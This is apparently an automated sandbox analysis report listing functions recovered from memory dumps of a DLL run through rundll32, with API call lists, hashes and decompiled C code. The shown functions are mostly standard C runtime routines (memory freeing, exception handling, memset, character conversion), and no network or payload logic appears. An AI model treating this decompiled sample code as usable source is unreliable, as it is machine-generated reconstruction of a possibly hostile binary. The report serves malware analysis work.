                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FF4CF, Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0911296f6b9e6e27eb15e1a12624b5418f1feb47bac677ce1b8594fa22459dd
                                                      • Instruction ID: ebe9fd6af581067d82ddb2ebc526d7e9af04b537960d8b1b2d2241cae40dde74
                                                      • Opcode Fuzzy Hash: e0911296f6b9e6e27eb15e1a12624b5418f1feb47bac677ce1b8594fa22459dd
                                                      • Instruction Fuzzy Hash: 4AC1C075D0434AEFDB45CFE8CA54BADBBB4AF0A314F244594D414A73A2CB349942CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F9041, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7F7D21: GetLastError.KERNEL32(00000008,6E849A90,6E80076C), ref: 6E7F7D25
                                                        • Part of subcall function 6E7F7D21: _free.LIBCMT ref: 6E7F7D58
                                                        • Part of subcall function 6E7F7D21: SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D99
                                                        • Part of subcall function 6E7F7D21: _abort.LIBCMT ref: 6E7F7D9F
                                                      • _memcmp.LIBVCRUNTIME ref: 6E7F92EB
                                                      • _free.LIBCMT ref: 6E7F935C
                                                      • _free.LIBCMT ref: 6E7F9375
                                                      • _free.LIBCMT ref: 6E7F93A7
                                                      • _free.LIBCMT ref: 6E7F93B0
                                                      • _free.LIBCMT ref: 6E7F93BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorLast$_abort_memcmp
                                                      • String ID: C
                                                      • API String ID: 1679612858-1037565863
                                                      • Opcode ID: e65af91c34e686cb82d211a45d5e2b9df4f723ce4139b7c8a1ec874da76560d8
                                                      • Instruction ID: 6599d39294f8abf35b468d1e6da66cfdb7d816604c66eef304c922fe1dcc373a
                                                      • Opcode Fuzzy Hash: e65af91c34e686cb82d211a45d5e2b9df4f723ce4139b7c8a1ec874da76560d8
                                                      • Instruction Fuzzy Hash: 7EC17D75A0121ADFDB64DF98C988A9DB7B4FF58314F1045EAD809A7364EB31AE81CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7DB6CC, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 73COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • UnDecorator::getArgumentList.LIBVCRUNTIME ref: 6E7DB6EC
                                                        • Part of subcall function 6E7DB5D6: Replicator::operator[].LIBVCRUNTIME ref: 6E7DB642
                                                        • Part of subcall function 6E7DB5D6: DName::operator+=.LIBVCRUNTIME ref: 6E7DB64A
                                                      • DName::operator+.LIBCMT ref: 6E7DB743
                                                      • DName::DName.LIBVCRUNTIME ref: 6E7DB78C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>
                                                      • API String ID: 834187326-463753507
                                                      • Opcode ID: e667ab413927f83d5243f35a6ec67e642506e8b17c0d63270075399d6df6df70
                                                      • Instruction ID: 3067481dcb4133acb7f4178bd066e54837fddd233da15316f8e7c502115f390f
                                                      • Opcode Fuzzy Hash: e667ab413927f83d5243f35a6ec67e642506e8b17c0d63270075399d6df6df70
                                                      • Instruction Fuzzy Hash: 1E21C374104649DFCB81CF9CC1A8BA53BE4EB06379F504469E449CB275CB35E94DCB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E802670, Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 6E8026F2
                                                      • _free.LIBCMT ref: 6E802716
                                                      • _free.LIBCMT ref: 6E80289D
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E81CFB0), ref: 6E8028AF
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,6E85655C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E802927
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,6E8565B0,000000FF,?,0000003F,00000000,?), ref: 6E802954
                                                      • _free.LIBCMT ref: 6E802A69
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 314583886-0
                                                      • Opcode ID: 8c7c18788c1d5be274a722cd6c6c558de5b3856ae0dcc818a0c86ae82633c5f2
                                                      • Instruction ID: 16c5bcc930945ab2550226b3c8a9f1bf5f167712ca686bf04baedb5b7a1a8c73
                                                      • Opcode Fuzzy Hash: 8c7c18788c1d5be274a722cd6c6c558de5b3856ae0dcc818a0c86ae82633c5f2
                                                      • Instruction Fuzzy Hash: 2CC15B71904209AFDB51CFFCCC54ADA7BBCEF46314F100D9AD89497296EBB89A42CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E80CFF7, Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCPInfo.KERNEL32(6E856204,6E856204,?,7FFFFFFF,?,?,6E80D2D0,6E856204,6E856204,?,6E856204,?,?,?,?,6E856204), ref: 6E80D0A3
                                                      • MultiByteToWideChar.KERNEL32(6E856204,00000009,6E856204,6E856204,00000000,00000000,?,6E80D2D0,6E856204,6E856204,?,6E856204,?,?,?,?), ref: 6E80D126
                                                      • MultiByteToWideChar.KERNEL32(6E856204,00000001,6E856204,6E856204,00000000,6E80D2D0,?,6E80D2D0,6E856204,6E856204,?,6E856204,?,?,?,?), ref: 6E80D1B9
                                                      • MultiByteToWideChar.KERNEL32(6E856204,00000009,6E856204,6E856204,00000000,00000000,?,6E80D2D0,6E856204,6E856204,?,6E856204,?,?,?,?), ref: 6E80D1D0
                                                        • Part of subcall function 6E7F99F0: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 6E7F9A22
                                                      • MultiByteToWideChar.KERNEL32(6E856204,00000001,6E856204,6E856204,00000000,6E856204,?,6E80D2D0,6E856204,6E856204,?,6E856204,?,?,?,?), ref: 6E80D24C
                                                      • __freea.LIBCMT ref: 6E80D277
                                                      • __freea.LIBCMT ref: 6E80D283
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                      • String ID:
                                                      • API String ID: 2829977744-0
                                                      • Opcode ID: 37d2024e7727afbeb7f200060ce5949e383e5644550ce8a2d7f688db002a2cd0
                                                      • Instruction ID: 4a0dd7264d2d963ba6ed07d7d6f552a2fbf1cef99d6288cfdc54d374fe2bf33d
                                                      • Opcode Fuzzy Hash: 37d2024e7727afbeb7f200060ce5949e383e5644550ce8a2d7f688db002a2cd0
                                                      • Instruction Fuzzy Hash: EC91A072E0021A9FEF108EE5CC51ADEBBB5AF0A754F054D59E818EB2D0D725D941CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E8054CD, Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: ccc3b26f615e305ecbc4d1b8523dcb3ae966539497d7e8706e356596bb34d9d0
                                                      • Instruction ID: 9875813a87979546e91f8e7d6e52a623d6965fe63df66fb74cf103ddd85106b7
                                                      • Opcode Fuzzy Hash: ccc3b26f615e305ecbc4d1b8523dcb3ae966539497d7e8706e356596bb34d9d0
                                                      • Instruction Fuzzy Hash: DB619271D00305EFDB60CFE9CD41B9ABBF9EB45720F104969D964EB395EB30A9418BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FD7F7, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleCP.KERNEL32 ref: 6E7FD839
                                                      • __fassign.LIBCMT ref: 6E7FD8B4
                                                      • __fassign.LIBCMT ref: 6E7FD8CF
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6E7FD8F5
                                                      • WriteFile.KERNEL32(?,?,00000000,6E7FDF6C,00000000), ref: 6E7FD914
                                                      • WriteFile.KERNEL32(?,?,00000001,6E7FDF6C,00000000), ref: 6E7FD94D
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: 45ca4f9ba28b2fd8564fac25e6166300864d964c4b99d99b34b3f25f9bb2e7c9
                                                      • Instruction ID: 693e4a158521d6efa4e64540239ba7f5ec0374dfbd526a7467a970bea980aed2
                                                      • Opcode Fuzzy Hash: 45ca4f9ba28b2fd8564fac25e6166300864d964c4b99d99b34b3f25f9bb2e7c9
                                                      • Instruction Fuzzy Hash: 7851A07190024ADFDB00CFE8C985BEEBBB9EF49300F14455AE955E7251D730A941CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E779C50, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 64%
                                                      			E6E779C50(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed char _v36;
				void* _v40;
				signed int _t77;
				signed int _t84;
				intOrPtr _t85;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr _t89;
				signed int _t91;
				int _t93;
				signed int _t98;
				intOrPtr* _t102;
				intOrPtr _t103;
				signed int _t107;
				char _t109;
				signed int _t113;
				void* _t114;
				intOrPtr _t123;
				void* _t125;
				intOrPtr _t133;
				signed int _t135;
				void* _t139;
				void* _t141;
				void* _t149;

				_t118 = __edx;
				_t102 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t102 = E6E7844B0(__ecx,  *_t102);
				_t103 = _a8;
				_t6 = _t103 + 0x10; // 0x11
				_t133 = _t6;
				_v20 = _t133;
				_v12 =  *(_t103 + 8) ^  *0x6e78c00c;
				E6E779C10(_t103, __edx, __edi, _t133,  *(_t103 + 8) ^  *0x6e78c00c, _t133);
				E6E77AE9C(_a12);
				_t77 = _a4;
				_t141 = _t139 - 0x1c + 0x10;
				_t123 =  *((intOrPtr*)(_t103 + 0xc));
				if(( *(_t77 + 4) & 0x00000066) != 0) {
					__eflags = _t123 - 0xfffffffe;
					if(_t123 != 0xfffffffe) {
						_t118 = 0xfffffffe;
						E6E77B090(_t103, 0xfffffffe, _t133, 0x6e78c00c);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t77;
					_v28 = _a12;
					 *((intOrPtr*)(_t103 - 4)) =  &_v32;
					if(_t123 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t107 = _v12;
							_t84 = _t123 + (_t123 + 2) * 2;
							_t103 =  *((intOrPtr*)(_t107 + _t84 * 4));
							_t85 = _t107 + _t84 * 4;
							_t108 =  *((intOrPtr*)(_t85 + 4));
							_v24 = _t85;
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t109 = _v5;
								goto L7;
							} else {
								_t118 = _t133;
								_t86 = E6E77B030(_t108, _t133);
								_t109 = 1;
								_v5 = 1;
								_t149 = _t86;
								if(_t149 < 0) {
									_v16 = 0;
									L13:
									E6E779C10(_t103, _t118, _t123, _t133, _v12, _t133);
									goto L14;
								} else {
									if(_t149 > 0) {
										_t87 = _a4;
										__eflags =  *_t87 - 0xe06d7363;
										if( *_t87 == 0xe06d7363) {
											__eflags =  *0x6e785264;
											if(__eflags != 0) {
												_t98 = E6E784270(__eflags, 0x6e785264);
												_t141 = _t141 + 4;
												__eflags = _t98;
												if(_t98 != 0) {
													_t135 =  *0x6e785264; // 0x6e779a03
													 *0x6e785148(_a4, 1);
													 *_t135();
													_t133 = _v20;
													_t141 = _t141 + 8;
												}
												_t87 = _a4;
											}
										}
										_t119 = _t87;
										E6E77B070(_t87, _a8, _t87);
										_t89 = _a8;
										__eflags =  *((intOrPtr*)(_t89 + 0xc)) - _t123;
										if( *((intOrPtr*)(_t89 + 0xc)) != _t123) {
											_t119 = _t123;
											E6E77B090(_t89, _t123, _t133, 0x6e78c00c);
											_t89 = _a8;
										}
										 *((intOrPtr*)(_t89 + 0xc)) = _t103;
										E6E779C10(_t103, _t119, _t123, _t133, _v12, _t133);
										E6E77B050();
										asm("int3");
										asm("int3");
										asm("int3");
										_t113 = _v32;
										_t91 = _v36 & 0x000000ff;
										_t125 = _v40;
										__eflags = _t113;
										if(_t113 == 0) {
											L46:
											return _v40;
										} else {
											_t93 = _t91 * 0x1010101;
											__eflags = _t113 - 0x20;
											if(_t113 <= 0x20) {
												L39:
												__eflags = _t113 & 0x00000003;
												while((_t113 & 0x00000003) != 0) {
													 *_t125 = _t93;
													_t125 = _t125 + 1;
													_t113 = _t113 - 1;
													__eflags = _t113 & 0x00000003;
												}
												__eflags = _t113 & 0x00000004;
												if((_t113 & 0x00000004) != 0) {
													 *_t125 = _t93;
													_t125 = _t125 + 4;
													_t113 = _t113 - 4;
													__eflags = _t113;
												}
												__eflags = _t113 & 0xfffffff8;
												while((_t113 & 0xfffffff8) != 0) {
													 *_t125 = _t93;
													 *(_t125 + 4) = _t93;
													_t125 = _t125 + 8;
													_t113 = _t113 - 8;
													__eflags = _t113 & 0xfffffff8;
												}
												goto L46;
											} else {
												__eflags = _t113 - 0x80;
												if(__eflags < 0) {
													L33:
													asm("bt dword [0x6e78c010], 0x1");
													if(__eflags >= 0) {
														goto L39;
													} else {
														asm("movd xmm0, eax");
														asm("pshufd xmm0, xmm0, 0x0");
														goto L35;
													}
												} else {
													asm("bt dword [0x6e78ccb4], 0x1");
													if(__eflags >= 0) {
														asm("bt dword [0x6e78c010], 0x1");
														if(__eflags >= 0) {
															goto L39;
														} else {
															asm("movd xmm0, eax");
															asm("pshufd xmm0, xmm0, 0x0");
															_t114 = _t125 + _t113;
															asm("movups [edi], xmm0");
															_t125 = _t125 + 0x00000010 & 0xfffffff0;
															_t113 = _t114 - _t125;
															__eflags = _t113 - 0x80;
															if(__eflags <= 0) {
																goto L33;
															} else {
																do {
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm0");
																	asm("movdqa [edi+0x20], xmm0");
																	asm("movdqa [edi+0x30], xmm0");
																	asm("movdqa [edi+0x40], xmm0");
																	asm("movdqa [edi+0x50], xmm0");
																	asm("movdqa [edi+0x60], xmm0");
																	asm("movdqa [edi+0x70], xmm0");
																	_t125 = _t125 + 0x80;
																	_t113 = _t113 - 0x80;
																	__eflags = _t113 & 0xffffff00;
																} while ((_t113 & 0xffffff00) != 0);
																L35:
																__eflags = _t113 - 0x20;
																if(_t113 < 0x20) {
																	L38:
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm0");
																	return _v40;
																} else {
																	do {
																		asm("movdqu [edi], xmm0");
																		asm("movdqu [edi+0x10], xmm0");
																		_t125 = _t125 + 0x20;
																		_t113 = _t113 - 0x20;
																		__eflags = _t113 - 0x20;
																	} while (_t113 >= 0x20);
																	__eflags = _t113 & 0x0000001f;
																	if((_t113 & 0x0000001f) == 0) {
																		goto L46;
																	} else {
																		goto L38;
																	}
																}
															}
														}
													} else {
														memset(_t125, _t93, _t113 << 0);
														return _v40;
													}
												}
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L47;
							L7:
							_t123 = _t103;
						} while (_t103 != 0xfffffffe);
						if(_t109 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L47:
			}


































                                                      0x6e779c50
                                                      0x6e779c57
                                                      0x6e779c5b
                                                      0x6e779c5c
                                                      0x6e779c62
                                                      0x6e779c6e
                                                      0x6e779c70
                                                      0x6e779c76
                                                      0x6e779c76
                                                      0x6e779c81
                                                      0x6e779c84
                                                      0x6e779c87
                                                      0x6e779c8f
                                                      0x6e779c94
                                                      0x6e779c97
                                                      0x6e779c9a
                                                      0x6e779ca1
                                                      0x6e779cfd
                                                      0x6e779d00
                                                      0x6e779d08
                                                      0x6e779d0f
                                                      0x00000000
                                                      0x6e779d0f
                                                      0x00000000
                                                      0x6e779ca3
                                                      0x6e779ca3
                                                      0x6e779ca9
                                                      0x6e779caf
                                                      0x6e779cb5
                                                      0x6e779d20
                                                      0x6e779d29
                                                      0x6e779cb7
                                                      0x6e779cb7
                                                      0x6e779cb7
                                                      0x6e779cbd
                                                      0x6e779cc0
                                                      0x6e779cc3
                                                      0x6e779cc6
                                                      0x6e779cc9
                                                      0x6e779cce
                                                      0x6e779ce4
                                                      0x00000000
                                                      0x6e779cd0
                                                      0x6e779cd0
                                                      0x6e779cd2
                                                      0x6e779cd7
                                                      0x6e779cd9
                                                      0x6e779cdc
                                                      0x6e779cde
                                                      0x6e779cf4
                                                      0x6e779d14
                                                      0x6e779d18
                                                      0x00000000
                                                      0x6e779ce0
                                                      0x6e779ce0
                                                      0x6e779d2a
                                                      0x6e779d2d
                                                      0x6e779d33
                                                      0x6e779d35
                                                      0x6e779d3c
                                                      0x6e779d43
                                                      0x6e779d48
                                                      0x6e779d4b
                                                      0x6e779d4d
                                                      0x6e779d4f
                                                      0x6e779d5c
                                                      0x6e779d62
                                                      0x6e779d64
                                                      0x6e779d67
                                                      0x6e779d67
                                                      0x6e779d6a
                                                      0x6e779d6a
                                                      0x6e779d3c
                                                      0x6e779d70
                                                      0x6e779d72
                                                      0x6e779d77
                                                      0x6e779d7a
                                                      0x6e779d7d
                                                      0x6e779d85
                                                      0x6e779d89
                                                      0x6e779d8e
                                                      0x6e779d8e
                                                      0x6e779d95
                                                      0x6e779d98
                                                      0x6e779da8
                                                      0x6e779dad
                                                      0x6e779dae
                                                      0x6e779daf
                                                      0x6e779db0
                                                      0x6e779db4
                                                      0x6e779dbb
                                                      0x6e779dbf
                                                      0x6e779dc1
                                                      0x6e779f03
                                                      0x6e779f09
                                                      0x6e779dc7
                                                      0x6e779dc7
                                                      0x6e779dcd
                                                      0x6e779dd0
                                                      0x6e779eb5
                                                      0x6e779eb5
                                                      0x6e779ebb
                                                      0x6e779ebd
                                                      0x6e779ebf
                                                      0x6e779ec0
                                                      0x6e779ec3
                                                      0x6e779ec3
                                                      0x6e779ecb
                                                      0x6e779ed1
                                                      0x6e779ed3
                                                      0x6e779ed5
                                                      0x6e779ed8
                                                      0x6e779ed8
                                                      0x6e779ed8
                                                      0x6e779edb
                                                      0x6e779ee1
                                                      0x6e779ef0
                                                      0x6e779ef2
                                                      0x6e779ef5
                                                      0x6e779ef8
                                                      0x6e779efb
                                                      0x6e779efb
                                                      0x00000000
                                                      0x6e779dd6
                                                      0x6e779dd6
                                                      0x6e779ddc
                                                      0x6e779e6d
                                                      0x6e779e6d
                                                      0x6e779e75
                                                      0x00000000
                                                      0x6e779e77
                                                      0x6e779e77
                                                      0x6e779e7b
                                                      0x00000000
                                                      0x6e779e7b
                                                      0x6e779de2
                                                      0x6e779de2
                                                      0x6e779dea
                                                      0x6e779df5
                                                      0x6e779dfd
                                                      0x00000000
                                                      0x6e779e03
                                                      0x6e779e03
                                                      0x6e779e07
                                                      0x6e779e0c
                                                      0x6e779e0e
                                                      0x6e779e14
                                                      0x6e779e17
                                                      0x6e779e19
                                                      0x6e779e1f
                                                      0x00000000
                                                      0x6e779e30
                                                      0x6e779e30
                                                      0x6e779e30
                                                      0x6e779e34
                                                      0x6e779e39
                                                      0x6e779e3e
                                                      0x6e779e43
                                                      0x6e779e48
                                                      0x6e779e4d
                                                      0x6e779e52
                                                      0x6e779e57
                                                      0x6e779e5d
                                                      0x6e779e63
                                                      0x6e779e63
                                                      0x6e779e80
                                                      0x6e779e80
                                                      0x6e779e83
                                                      0x6e779ea1
                                                      0x6e779ea5
                                                      0x6e779ea9
                                                      0x6e779eb4
                                                      0x6e779e85
                                                      0x6e779e85
                                                      0x6e779e85
                                                      0x6e779e89
                                                      0x6e779e8e
                                                      0x6e779e91
                                                      0x6e779e94
                                                      0x6e779e94
                                                      0x6e779e99
                                                      0x6e779e9f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e779e9f
                                                      0x6e779e83
                                                      0x6e779e1f
                                                      0x6e779dec
                                                      0x6e779dec
                                                      0x6e779df4
                                                      0x6e779df4
                                                      0x6e779dea
                                                      0x6e779ddc
                                                      0x6e779dd0
                                                      0x6e779ce2
                                                      0x00000000
                                                      0x6e779ce2
                                                      0x6e779ce0
                                                      0x6e779cde
                                                      0x00000000
                                                      0x6e779ce7
                                                      0x6e779ce7
                                                      0x6e779ce9
                                                      0x6e779cf0
                                                      0x00000000
                                                      0x6e779cf2
                                                      0x00000000
                                                      0x6e779cf0
                                                      0x6e779cb5
                                                      0x00000000

                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 6E779C87
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 6E779C8F
                                                      • _ValidateLocalCookies.LIBCMT ref: 6E779D18
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 6E779D43
                                                      • _ValidateLocalCookies.LIBCMT ref: 6E779D98
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: 17c8c199d4821eb65d5368404b222e43ece9eae64b332dec0fa891562e155dc2
                                                      • Instruction ID: 82ae437dea98b38a0a5221aec7d50379d02b56fc02fc20dbc0832943b4960b49
                                                      • Opcode Fuzzy Hash: 17c8c199d4821eb65d5368404b222e43ece9eae64b332dec0fa891562e155dc2
                                                      • Instruction Fuzzy Hash: C541B2349012099FCF20CFE8C994A9F7BF9BF16318F118565D8145B361D731AA01CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E781846, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E781846(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6E78180E(_t45, 7);
					E6E78180E(_t45 + 0x1c, 7);
					E6E78180E(_t45 + 0x38, 0xc);
					E6E78180E(_t45 + 0x68, 0xc);
					E6E78180E(_t45 + 0x98, 2);
					E6E77D646( *((intOrPtr*)(_t45 + 0xa0)));
					E6E77D646( *((intOrPtr*)(_t45 + 0xa4)));
					E6E77D646( *((intOrPtr*)(_t45 + 0xa8)));
					E6E78180E(_t45 + 0xb4, 7);
					E6E78180E(_t45 + 0xd0, 7);
					E6E78180E(_t45 + 0xec, 0xc);
					E6E78180E(_t45 + 0x11c, 0xc);
					E6E78180E(_t45 + 0x14c, 2);
					E6E77D646( *((intOrPtr*)(_t45 + 0x154)));
					E6E77D646( *((intOrPtr*)(_t45 + 0x158)));
					E6E77D646( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E77D646( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                      0x6e78184c
                                                      0x6e781851
                                                      0x6e78185a
                                                      0x6e781865
                                                      0x6e781870
                                                      0x6e78187b
                                                      0x6e781889
                                                      0x6e781894
                                                      0x6e78189f
                                                      0x6e7818aa
                                                      0x6e7818b8
                                                      0x6e7818c6
                                                      0x6e7818d7
                                                      0x6e7818e5
                                                      0x6e7818f3
                                                      0x6e7818fe
                                                      0x6e781909
                                                      0x6e781914
                                                      0x00000000
                                                      0x6e781924
                                                      0x6e781929

                                                      APIs
                                                        • Part of subcall function 6E78180E: _free.LIBCMT ref: 6E781833
                                                      • _free.LIBCMT ref: 6E781894
                                                        • Part of subcall function 6E77D646: HeapFree.KERNEL32(00000000,00000000), ref: 6E77D65C
                                                        • Part of subcall function 6E77D646: GetLastError.KERNEL32(?,?,6E77CED9), ref: 6E77D66E
                                                      • _free.LIBCMT ref: 6E78189F
                                                      • _free.LIBCMT ref: 6E7818AA
                                                      • _free.LIBCMT ref: 6E7818FE
                                                      • _free.LIBCMT ref: 6E781909
                                                      • _free.LIBCMT ref: 6E781914
                                                      • _free.LIBCMT ref: 6E78191F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 25829e1b0db376a3636534ac9ef01b16ff24d3b123a46a026cd4e15fed0f56c7
                                                      • Instruction ID: 8e419c8e7247c9c786fa63b533584d733cdca3d8f19066225253fa8f0ce6cea2
                                                      • Opcode Fuzzy Hash: 25829e1b0db376a3636534ac9ef01b16ff24d3b123a46a026cd4e15fed0f56c7
                                                      • Instruction Fuzzy Hash: 80115C71A40B08AAEA30AFF0CE4EFCB77DD9F51755F400C64A2ADE6060DB34E5088B94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E805A3C, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E805722: _free.LIBCMT ref: 6E80574B
                                                      • _free.LIBCMT ref: 6E805A8A
                                                        • Part of subcall function 6E7F99B6: HeapFree.KERNEL32(00000000,00000000), ref: 6E7F99CC
                                                        • Part of subcall function 6E7F99B6: GetLastError.KERNEL32(6E849074,?,6E805750,6E849074,00000000,6E849074,00000000,?,6E805A55,6E849074,00000007,6E849074,?,6E804DF4,6E849074,6E849074), ref: 6E7F99DE
                                                      • _free.LIBCMT ref: 6E805A95
                                                      • _free.LIBCMT ref: 6E805AA0
                                                      • _free.LIBCMT ref: 6E805AF4
                                                      • _free.LIBCMT ref: 6E805AFF
                                                      • _free.LIBCMT ref: 6E805B0A
                                                      • _free.LIBCMT ref: 6E805B15
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: a01b1006e6bb933898f3c53528a737dd94d6a31eccef99a5c092665b370c7cef
                                                      • Instruction ID: cf991aae1981dfa395d1f9d3a0b0917803ddfd0c551417fe1ba6d77fe323a6c0
